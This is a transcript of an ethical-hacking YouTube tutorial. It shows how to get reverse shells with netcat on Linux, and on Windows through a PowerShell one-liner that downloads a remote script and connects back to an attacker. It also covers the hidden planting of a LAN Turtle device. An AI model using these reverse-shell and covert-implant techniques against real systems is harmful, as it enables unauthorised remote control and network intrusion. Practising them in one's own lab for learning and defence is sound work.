how to get remote access to your hacking targets // reverse shells with netcat (Windows and Linux!!)

Captions
Netcat, or netcat, it's a tool we can use to gain remote access to our hacking targets. And look at that, yes, it worked! It's amazing. In this video I'm gonna show you how to do it. I'm gonna show you what netcat is and how we can use it to gain a reverse shell on Linux and Windows machines. So this is scary, dude. And also, what the junk is a reverse shell? We'll talk about that. And bonus, check this out, we're going to play with this guy. It's a LAN Turtle from Hak5. It's a wicked awesome hacking device that we can use to just plug into a network, just plug it in, walk away, and we have remote access. Also, do you want one of these? I'm going to give away two of these in this video. Stick around till the end and I'll tell you how to enter the contest. And as always, when I'm showing you these hacking tools, this is for educational purposes only. You do not have permission to hack anyone for any reason, so just don't do it. But I do want you to try this on yourself. I want you to try it on your own home network. Why? Well, because it's fun, and it's also a skill that you need if you want to become an ethical hacker, a pen tester, or whatever, and it's something you'll use on CTFs, on TryHackMe, Hack The Box, all the time. So you got to know how to do this. And shout out to Bitdefender for sponsoring this video. We'll talk more about them here in a bit, but first, let's start hacking. But hold on, what do we need for hacking? We need coffee, don't we? Let's go get some coffee. [Music] All right, got my coffee. Let's start hacking. Oh, and also, have you hacked the YouTube algorithm today? Let's make sure you do: hit that like button, comment, notification bell, all that YouTube stuff. Let's hack YouTube today, ethically of course.

Okay, apart from coffee, what else do you need to actually walk through this hack? Let me show you. The first thing you'll need is a target system, which will actually be you. It'll be a computer in your home network. Now ideally you're going to have a Linux computer and a Windows computer so we can have fun and test both, and they don't have to be physical computers, they can be virtual machines. And if you have no idea what those are or how to set those up, I got a video right here, check it out. Now for this you'll want a computer outside of your home network. How do you do that? The cloud, man. That's the easiest way to do it. For that you do have a ton of options, but I'm going to walk you through one of my favorite cloud providers, Linode, and if you use my code "networkchuck" when you first sign up, you'll get $100 free credit, so this should be free for you.

Okay, first let's talk about what we're doing, because I said we're getting remote access into a computer and we're going to be using something called a reverse shell. But what does that mean? Here is our hacking target, and your hacking target is going to be, again, inside your home network. And keeping in mind, for the most part the home network is keeping your target safe, because in most cases you have a router in your home network, right? And built into that router is a firewall, and it makes it pretty hard for us hackers to attack anything inside that network. Remember, our goal here is to remotely access our target. When I say access, I mean I want to be able to log in to, like, a command line, a shell, and enter commands and do stuff. That's the ultimate goal. But again, the firewall will block most connections trying to come in to your home network, protecting your target, and the same thing does apply to most enterprise networks. We can't get in because the firewall blocks things. So since we can't connect to our target and access his shell, what if we had our target connect to us? What? Yeah, that's what a reverse shell is, where instead of us trying to connect to him, he connects to us. But how do we do that, and why? Why are we doing that? Well, first start with why we're doing it, and we'll get to how we do it. Yes, the firewall is blocking most inbound connections, blocking us, but you know what he's not blocking? He's not blocking connections going out, or most of them anyway. So for example, when our target wants to visit a website, the firewall's like, "Yeah man, come on through, you're good, you're trusted, you're coming from inside the network." So if we could get our target to connect to us, that connection shouldn't be blocked. Okay, sounds cool in theory, but Chuck, how do we do that? Netcat. That's how we do it. Check it out, it's really cool.

Now netcat is not a new tool. It's been around for a long time, and it's not just used for hacking. It's often called the Swiss Army network knife, something, right? No, what's it called? Oh, the network Swiss Army knife, yeah, that's what they call it. Networking system admins often use this to scan networks, similar to Nmap. You can transfer files and do some cool stuff. Like, it's a powerful tool, but the most popular use is for reverse shells. So let's make this happen. Here's our first scenario. Our target will be a Linux system. The attacking machine will be our cloud machine, which I'm going to set up on Linode. This actually won't change, this will be the same thing for all scenarios. So let's go set up Linode. So navigate to linode.com, or check that link in the description, and get you an account, or just sign in. Once you're in, I'm going to click on Create at the top left here, and Linode, it's basically a virtual machine in the cloud, if you're not familiar with this. Now for this we won't need much. I want to change my distribution to Ubuntu 18, it's just one of my favorites, I like it, 18.04, there we go. It's like my region. My plan, I'll make the smallest one, one gig, it's only five dollars a month. That's awesome, and again, if you have the $100 free credit, it's free anyways. I will name it, put in my password, and click on Create. That wasn't so bad, right? Like, the sucker's ready. Well, almost, it's provisioning, so perfect time for a coffee break. I know I'm drinking espresso, totally out of character for me, but it's good. Okay, my machine is running because it says it right there. I'm gonna copy my SSH access right here. I'm going to launch my terminal, it's going to launch CMD on Windows, and I will get logged in, ssh at the IP.

Now the beautiful part about netcat is that it's installed on most Linux distros by default. So if we try to use it real quick, the command will be nc. Just typing in nc, it's already installed, so I don't have to worry about that. Now I didn't mention this before, but for our attack right now, in this scenario, we will need netcat installed on both the attacking system and the target system. But since we have a Linux machine attacking a Linux machine, they should both have netcat. And in my situation I have Kali Linux as my target, which is flipping the script a bit. Take that, Kali. Anyways, now again, because this is a reverse shell, things are a bit backwards. As the attacker we're not going to attempt to connect to anything, we're actually going to wait for a connection to us. But we have to wait, we have to listen, and that's our first task. We're going to set up a listener. We're going to use a netcat command that basically says, "Hey, we're listening for a connection, for anyone to come here," and we're going to specify a certain port that we're listening on. Let's try it out real quick. It's very, very simple too. The command will be nc for netcat, and we're going to use a few switches here, a few options, so I'll hit dash, or tack, l n v p. l is for listening, "Hey, can you hear me?", that's the mode we're putting netcat in. Actually the l should be lower case, case sensitivity is very important in Linux. n is for no DNS, we're only using IP addresses. v is for verbose, we're telling netcat, "Whatever happens, tell us everything that's happening, don't hold back." And then p is for port, which we're gonna specify right after that switch, so let's do it right now. Now here it can really be any port you want, but your best bet to avoid any firewall detection is to keep it under the 1000 well-known ports, or keep it under a thousand. For me, I'm going to try out using port 87. Now in most cases this would be it, that's all you have to do, but for our Linode box here, it does have quite a few interfaces, so we have to tell it which interface to actually do this on, so that will specify the IP address. So we'll do dash, or tick, s for source, and then the IP address of our box here, and we just connected to that, so we should already know it, but I forgot it, so I'm going to go to my Linode and copy it, paste it in there, and that's it. So here's what we're going to do, watch, we'll hit enter and he's listening. He's ready. He's like, "Uh, what was that? Did you say anything?" He's waiting, he's waiting.

So now we have to get our target to actually connect to us. Let's try that. Here I'm going to be using my Kali Linux machine, voldemort, he who must not be named. Here the command will be nc, and then we'll do tack, or switch, e. Now I will say the dash e option isn't available on most Linux distros. This is what's referred to as the traditional version of netcat, and I found that dash e doesn't exist anywhere. It's kind of considered an insecure thing, which makes sense, but we're going to use dash e to specify our shell we're going to use, so, or the shell I'm offering to my attacker here, "Attack me!" It'll be forward slash bin forward slash bash. So if you're using Kali or something similar, this should work great. If it doesn't, just don't use the dash e switch, you should be fine. And then the IP address, I'm gonna paste that, this is the IP address of the attacker, our cloud machine, and then the port that we set earlier, port 87, and we're going to hit enter. This is it, this is it, ready, go. What happened? Nothing happened here. We have to go look at our other machine here, and look at that, yes, it worked! Ah yes, connection from our home network. The victim has successfully connected to the attacker. We tricked him. But how do we use it? What's it look like? Let's try it. We're already there, we just got to hit enter a few times. Let's try to type in some commands, like whoami. Oh, I'm networkchuck. Let's ls. Oh, we can see what's inside there. Let's do uname -a. We can see what the system's about. So we're in there, we have control. We successfully have a reverse shell. That's awesome, right?

But you might be wondering this: how do we get our target machine to enter this command to try and connect to us? Well, in a lot of cases, this command we have, the nmap, or the netcat command, it could be contained within a script that we somehow get installed on that machine using other hacking methods. Maybe it's a phishing email, they open it and it's just automatically added to their machine and it runs automatically. These are often referred to as payloads, and it may not be as simple as, like, an nc or netcat command. It might be something crazy using Metasploit or Meterpreter or all kinds of stuff, but that's the gist. You would somehow get something on that computer to remotely connect to you using a script like this. And in case you're wondering, this is a basic form of what's called a RAT, or a remote administration tool. It's what hackers use to gain remote access to their victims. So your grandma, checking her email, she clicks on that link, it downloads something, that script could be a RAT that is making an outbound connection through her firewall, and the firewall's like, "Cool, yeah, you're leaving, you're good, you're fine, connect to the attacker." We don't know it's an attacker, but the RAT does. That's how these things happen.

Let me ask you a question: how do you know if your grandma doesn't already have a RAT on her computer? Actually, shoot, how do you know you don't have a RAT on your computer, or your friends or your family? The simple fact is you probably don't know, unless you have something monitoring and protecting your computers. You're gonna need something like the sponsor of this video, Bitdefender. Now I just installed the sucker on my computer. Look at this, three threats already blocked. It actually found a malicious file. What the junk? So if you're looking for a way to protect you and your family from RATs and malware and all kinds of crazy stuff, and also to find out maybe you already might have one, check out Bitdefender Total Security. Malicious software like worms, trojans, rootkits, spyware, ransomware, it's got your back, it'll find it. You can also look at the network traffic of your computer, analyze it, and go, "Huh, that don't look right, let's stop that," stop it before something bad happens, like, I don't know, maybe an attacker gets a reverse shell to your computer. It can do that. It'll also help out with spam and phishing attacks, all things that plague our families who aren't very tech savvy. I mean, just yesterday, actually, was that today? My wife's like, "Hey, can I click on this link? Is this a fraud?" It was, and she almost clicked on it. Bitdefender will actually prevent those links from opening, from downloading the stuff, bad stuff. So anyways, Total Security, it does all the stuff I mentioned and a lot more. If you want to check it out, link below. If you use my link, you do get 120 days of free protection for five devices. So give it a try, show some love to Bitdefender for sponsoring this video and helping me do more of this. Yeah, because it's a dangerous world out there.

Now your grandma probably isn't using Linux, right? She's probably using Windows. Most people use Windows as their desktop computer. So let's test out doing this on Windows, which is really kind of scary and really cool. So now for scenario two. Again, the attacker's gonna be the same as before, we're gonna run the exact same command, same story, whatever, but now our target is gonna be Windows. This is crazy. Now for Windows we do have a few options. You can actually install netcat on Windows, so that's one way to do it, run netcat like we did on Linux, on Windows. But I think something even more nefarious is to run something built in. All Windows systems have something called PowerShell built into them. It's like command line, and we can use PowerShell to connect to us, the attacker. So let's get our attacking machine set up first. Now I will say this, the command will be the same, but just a little bit different because we're attacking Windows. I'll show you, and this is actually fantastic. This is a GitHub repository you need to check out, I got a link below. It's called PayloadsAllTheThings, and essentially it shows you how to execute all these scripts on all the different platforms. You can do it in Python, Ruby, PowerShell, that's what we care about, right? It's really awesome. So I know my PowerShell thing is all the way at the bottom here, all the way down here, bam, fully interactive reverse shell on Windows. Scary. Let's try it. So on the server side, this is what we want. Now I'm not going to copy the whole thing. All I want right now is this first bit, right before that bracket here. What do you call that? My brain's melted, I don't know what it's called. I'm gonna copy all this right here and paste that into my server, then I'll put that bracket in there. Oh, I gotta Google it now, what is that called? Okay, brain unmelted, it's called a pipe, duh, pipe, oh my gosh. Sometimes, do you forget crap all the time? Sometimes that's me. And just after the pipe I'm gonna use that same command, the ncat command, ncat, netcat, nc -lvnp, our port, 87, and then dash s for our source, and we'll specify our IP address. Now all this right here, I'm not going to talk about that. That's a video for another time, just trust me, it works, trust me blindly. So we're going to hit enter and we're going to start listening. We're listening.

Now for the Windows side, and it's so cool and scary at the same time, client side, I'm going to copy this right here. I'm going to open up a text editor, just open up Notepad, paste that, so I can change some information on it, really just two things at the end here: the IP address that we're going to connect to, which will be our attacker, and then the port, which was port 87. So I'm going to copy all that and launch PowerShell. So to launch PowerShell on Windows, just do command s, search for PowerShell, there she is. Now yours might be blue, mine is black because I changed it, I like black. And now we're gonna paste our command. So it just did something. Now I think it worked, but what just happened here is that command actually went out and downloaded this PowerShell script. Notice it's from GitHub. The extension is ps1, that's what you'll see for PowerShell scripts, and it did it. So let's go look back at our server and see if things happened. It did. So this is scary, dude, check this out. Here's where we were running our command and we're listening. The connection came in and boom, we're suddenly in PowerShell, we're suddenly on my computer. What? What? That's nuts. If I just type in, like, dir, I can see all my stuff. I mean, I can do anything I want. That's crazy, right? Now if you're tracking with me here, here's what we did again. We set up a listener using netcat, we're saying yes, we are listening, we have our server ready, and then using built-in PowerShell we ran a command that downloaded the script that initiated a connection out to us. We listened, we heard, we accepted the connection, and that gave us shell access, a reverse shell, a reverse PowerShell, into that Windows machine. That's cool, that's awesome. Now there is a lot more to the world of netcat and creating reverse shells. It's a whole thing. What I'm hoping is that this, what you saw here, gives you just that itch to start just digging deeper and trying it out for yourself. Again, this is a skill that you'll use a lot in CTFs on TryHackMe, Hack The Box, all those websites, and also something you'll use as a professional pen tester or an ethical hacker.

Now there is one more thing I want to show you, and that's this guy right here, a LAN Turtle. This little guy doesn't look like anything really, just like a dongle, a dongle you might see laying around. It's actually a little Linux computer. Isn't that cool? It's a Linux computer powered via USB, has an Ethernet port on the other side, but lurking underneath the shell, the turtle shell here, is a ton of hacking tools, one hacking tool in particular that we're talking about right here. You guessed it, man, there's netcat on this sucker. It's awesome. Okay, cool, it's a little Linux box, it has netcat, but how do we use it like this? Check this out. Now again, this little guy can do so much more than what I'm about to show you, but because we're talking about netcat, I want to show you netcat. This thing can be powered via a little USB power bank. So here's the scenario. Let's say you're pen testing a network, and let's say you're on site at the business, and you see on the wall over there, "Hey, what's that? Oh, it's an Ethernet port," or maybe you see a switch, "Oh, a switch." I want to slowly get out my LAN Turtle, plug it in, plug it into the switch, plug it into my USB power bank, hide it behind something where people can't see it, and then leave. You're done, go home, because yeah buddy, you've got remote access to that network. So we have our turtle in place on the network, and now we need to listen for his connections. We're going to run our same command. Now I'm going to remove all the Windows-specific stuff, just going to keep the nc -lvnp 87, all that stuff. We're going to start listening. Now what's cool about this LAN Turtle, because I have netcat running on it, it's actually got a script that's reaching out to my server constantly as soon as it comes up, and boom, connection received. Now I'm going to hide this IP address because it's actually my real home IP address, but dude, here's a scenario: someone snuck into my house, on my home network, and plugged a freaking turtle into it. That turtle, because it has netcat running on it, broke through my firewall. It connected to an attacking PC, and now this attacking PC can run any command he wants off of this little Linux machine, this LAN Turtle. Like, watch, we can run things like Nmap, we can discover crap, ready? Well, I tried whoami, didn't work. We'll do nmap -sT and I'll do a subnet, or I'll do an IP range, and watch what happens. Now this is crazy, right? Like, I'm logged in, or I'm reverse shelled into this turtle here, and it's hidden, it's hidden, you can't see it, and I have access to the network it's connected to. That's a little crazy. There it goes, it finished. Again, this LAN Turtle can do a lot more. I am giving away two of these. Check it out, link below. It's gonna be a little contest. Now to enter the contest you will need a secret phrase, a secret code. The code is going to be given right now. It is "the network chuck turtle", all one word, just like the way you see it on the screen. You will need that to enter the contest. But yeah, reverse shells, they're kind of crazy, right? They are a common way that hackers will use to get into a machine, to have access to it remotely. But anyways, that's about it, guys. Let me know what you think of the video in the comments below. Did you try this? Did you have fun? Let me know. Do you have any questions? Do you need help? Also let us know in the comments below. And don't forget, I do have a walkthrough, a guide, in the description, so if you'd like to follow along and want to be able to copy commands and stuff, I got it there. And of course, don't forget to hack that YouTube algorithm: hit that like button, notification bell, comment, subscribe. We gotta hack YouTube today, but we gotta do it ethically, like everything we do. Yep, that's about it. I'll catch you guys next time. That's cool, I'm not drinking that anyways. [Music] You.
Info
Channel: NetworkChuck
Views: 602,738
Rating: undefined out of 5
Keywords: Rat, remote access tool, netcat, ncat, ethical hacking, network chuck, networkchuck, lan turtle, hak5, reverse shell, reverse powershell
Id: bXCeFPNWjsM
Channel Id: undefined
Length: 20min 7sec (1207 seconds)
Published: Thu Jul 08 2021